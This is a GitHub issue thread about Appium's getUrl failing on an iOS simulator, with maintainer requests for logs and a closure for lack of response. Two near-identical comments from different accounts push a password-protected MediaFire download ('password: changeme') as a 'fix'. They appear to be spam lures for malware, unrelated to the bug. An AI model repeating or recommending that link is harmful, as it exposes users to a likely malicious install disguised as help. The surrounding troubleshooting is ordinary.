### ISSUE TITLE
Driver getUrl not working for Ios simulator - appium 2.6.0

### ISSUE THREAD

**Issue by aksh-02** [appium/appium#20496]
Environment
Appium - 2.6.0
XCUITest - 7.15.3
Xcode 16.0, Build version 16A5171r
Mac 14.5 (Arm)

Current Behavior
driver.geturl(<URL>) is not opening the page and even the url bar is not updated and is stuck on about:blank
<img width="456" alt="image" src="https://github.com/user-attachments/assets/085899fa-b4da-48fd-8562-8076957f2220">

Expected Behavior
driver.geturl(<URL>) should update the url bar in simulator and go to the page

Appium Logs
https://gist.github.com/aksh-02/25973f5ba1a1fec5f8ba46ca922cb18d

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by mykola-mokhnach** [comment]
- Please make sure you use the latest server and driver versions before reporting the issue.

Are you sure the attached log is the valid one? The screenshot displays iOS while the log is from Android.

**Comment by aksh-02** [comment]
my bad, correct logs updated @mykola-mokhnach

**Comment by mykola-mokhnach** [comment]
Sorry, but the provided log is still coming from an outdated driver. We do not provide patches to older versions.
Also it looks messy, like two different processes are writing to the same destination.

**Comment by itkhanz** [comment]
@aksh-02  root cause might lie in your test setup and client side code. 
I just checked getting the URL on iOS Simulator using Appium server version 2.6.0 and it works for me.

**Comment by mykola-mokhnach** [comment]
Closed because of no response
